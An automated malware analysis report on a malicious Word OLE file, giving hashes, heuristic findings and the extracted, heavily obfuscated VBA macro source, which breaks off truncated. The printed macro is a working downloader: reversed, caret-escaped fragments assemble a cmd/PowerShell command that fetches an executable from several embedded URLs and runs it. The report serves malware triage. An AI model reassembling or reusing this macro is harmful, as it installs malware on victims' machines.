Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5fb7e215b93b39b7…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 76.0 KB
First seen: 2018-10-07
MD5: 638c52b5879572e0b0fd1efcf43e6ca0
SHA-1: e01992ea5f4dd76b256f2e7d319a484adcfbec0d
SHA-256: 5fb7e215b93b39b78b6ccabd54ee4597a927a5a1b57336134e862c3871ef85e2
Risk score: 82

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic)

The sample contains VBA macros that are heavily obfuscated, making it difficult to determine the exact payload. However, the presence of legacy WordBasic auto-exec markers and the structure of the obfuscated script suggest an attempt to execute commands, likely for downloading and running a secondary payload. The large slack space in the OLE structure is also a common indicator of packed or obfuscated content.

Heuristics (4)

  • OLE document has large unaccounted-for region (severity: high; rule: OLE_SLACK_ANOMALY)
    OLE file is 77,824 bytes but its declared streams total only 36,801 bytes — 41,023 bytes (53%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4142 bytes
SHA-256: 92cd626f384ff185ccfb002164db003078b479e64e1e53159c0c43b95754b064

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "aNHwYTzHKBU"
Function YFZsHuzjH()

On _
Error _
Resume _
Next
Set joIwG = SizaTS
   Set XtWRms = rzilu
   Set HTbQn = iHAISk
   Set oAiVa = LFDBjz
   Set UvSJs = iKtAkq
jOtrSdZQrf = Format(Chr(10 + 14 + 1 + 18 + 56)) + "md /V^" + ":" + "^ON/" + Format(Chr(7 + 9 + 0 + 12 + 39)) + Format(Chr(3 + 4 + 0 + 5 + 22)) + "s^" + "e" + "^t Q" + "^j=" + "   ^ ^ " + " " + "  ^ ^ "
Set witMf = EpIrYE
   Set rQcvw = owVqd
   Set WhwIt = zAQTB
BZtsZvPD = "^ ^ " + "^ ^ ^  " + " }}^" + "{^h" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^t^a" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^" + "}^;ka^e" + "rb" + ";" + "^DvI" + "$"
Set KVdBaw = hTkoJ
   Set DArTE = UnfmS
   Set wOaLn = NYjwb
   Set KJwsGn = QAHQS
ujQGs = "^ ^m" + "etI^-^e" + "^k^o" + "vn^I" + "^;)^" + "DvI^$ " + ",S" + "^U^m" + "^$(^e" + "^liFdao" + "^ln"
Set lpjZo = BhcQkB
   Set RbIjuN = bnqof
RQMVq = "woD.m^K" + "d^" + "$^{yrt^" + "{)" + "^" + "GX"
Set aAnuwC = GsmSIb
   Set WmPfij = iWASJ
zShaskjt = "v^$ " + "ni " + "^S^U" + "^m$(" + "h" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "a^er^" + "of^;'ex" + "e^.'^+" + "^t^Un$"
Set JUzpBQ = GtibUP
   Set FbHLUC = bTMSS
MnmlwZ = "+^'" + "^\" + "'^" + "+" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "i^lb^" + "u^p^:" + "v" + "n^e^$" + "^" + "=^Dv^I$"
Set toQHdz = mSLZf
   Set jzfNNp = EIUivo
   Set HLskuv = BqVjts
   Set uXkEdJ = OtSHHT
   Set uWuiM = ahVwp
NSYlscpHp = "^;" + "'" + "676'^" + " " + "=^ tUn^" + "$^;" + ")'" + "^@'(^ti" + "^l^" + "p^" + "S.'" + "v^zq" + Format(Chr(10 + 14 + 1 + 18 + 56))
Set QzBLq = MwOScI
   Set OYzpK = kZRiGl
mWPlCOJ = "^A^B^w" + "hq1/" + "mo" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.gni^" + "k^d^ia"
Set WsuqRF = ofHTLl
   Set FEZHL = ahRwEP
   Set hawjD = Jiwwjq
   Set irZwj = zfnRA
jFrZRfiQ = "r//^:p" + "^tt^h^" + "@ziIDLs" + "^MX^" + "o6/^m" + "o" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.^de"
Set wskOR = aDtDZ
   Set RHHIf = jZNpz
   Set AJAioz = wFZiHa
EKhtwhPv = "ti^mi^" + "ls^ko" + "ob" + "^mur" + "t" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^eps" + "/" + "/^:p^tt" + "h^@A" + Format(Chr(7 + 9 + 0 + 12 + 39)) + "^" + "2fQu^x^" + "OP" + "^3/vvv" + "^"
Set zVYlVw = nmMDU
   Set pqhBRH = JVEcC
   Set SCHqsB = lwRSYQ
   Set ZGTzj = AzVWTA
   Set uELuq = LiGZp
jtaQWAtK = "w^w" + "/" + "ku.^" + "o" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.b^e" + "^we" + "^ht4/" + "/^:^" + "pt^t^h" + "^@^"
YFZsHuzjH = jOtrSdZQrf + BZtsZvPD + ujQGs + RQMVq + zShaskjt + MnmlwZ + NSYlscpHp + mWPlCOJ + jFrZRfiQ + EKhtwhPv + jtaQWAtK
   Set mlPwIQ = NHiZc
   Set hrtEs = vUKqk
   Set jHLYv = CBHvPd
   Set pkiTjf = cfPkUj
   Set tLSGK = qlPHb
End Function
Function miqlSuTLK()

On _
Error _
Resume _
Next
Set zVozG = qopFD
   Set wilaS = WSmmqd
   Set SkROId = qqHEC
   Set piibMo = fSGbi
viMir = "xb" + "O^l^X" + "N^qX^" + "2^k/rf." + "t" + "pe" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "no" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^" + "or" + "u^emo" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "/"
Set NjzKu = GDilBR
OXTJVwzAIiW = "/:p^" + "tth^" + "@^" + "Hv^9xvu" + "^2y" + "jE/ri^"
Set YfwQAL = dpHCRP
   Set XLhni = hkXvkG
   Set niwKYC = SlAibz
VUvbCOEkzi = ".tn^ig" + "^a" + "^m" + "//:" + "pt^" + "th^'^" + "=G^Xv$" + "^;tn" + "^e^il" + Format(Chr(7 + 9 + 0 + 12 + 39)) + "^b" + "eW^"
Set crYizW = pZcfM
   Set OowkOt = rCVsp
   Set Skdmd = qkbwDG
rDoJmdoXLXc = ".teN^" + " ^" + "t" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "e^jb" + "^o^-w" + "^en^=^" + "m" + "K"
Set LDjWU = LGUiT
KCwCVmH = "d$ " + "^lle" + "h^sr" + "^ew^o^p" + "&&" + "^for" + " /" + "^L %V" + " ^in (3" + "85^,^-" + "1,^0)^" + "do" + " s^e^t "
Set barbs = kfuzRr
   Set ItofUc = tUjZU
QESpiYotpA = "5^X=" + "!5^X!!" + "Q^j:~%" + "V," + "1" + "!&&^" + "if"
Set Fvrfab = BNLvXf
VjIcPJw = " %V " + "l^eq ^" + "0 " + Format(Chr(10 + 14 + 1 + 18 + 56)) + "a" + "^l^l %5" + "^X:~^"
Set ciiwa = nhQBhG
uuiAb = "-38^6" + "%" + Format(Chr(3 + 4 + 0 + 5 + 22)) + " " + " " + ""
miqlSuTLK = viMir + OXTJVwzAIiW + VUvbCOEkzi + rDoJmdoXLXc + KCwCVmH + QESpiYotpA + VjIcPJw + uuiAb
   Set XCEoC = MzF
... (truncated)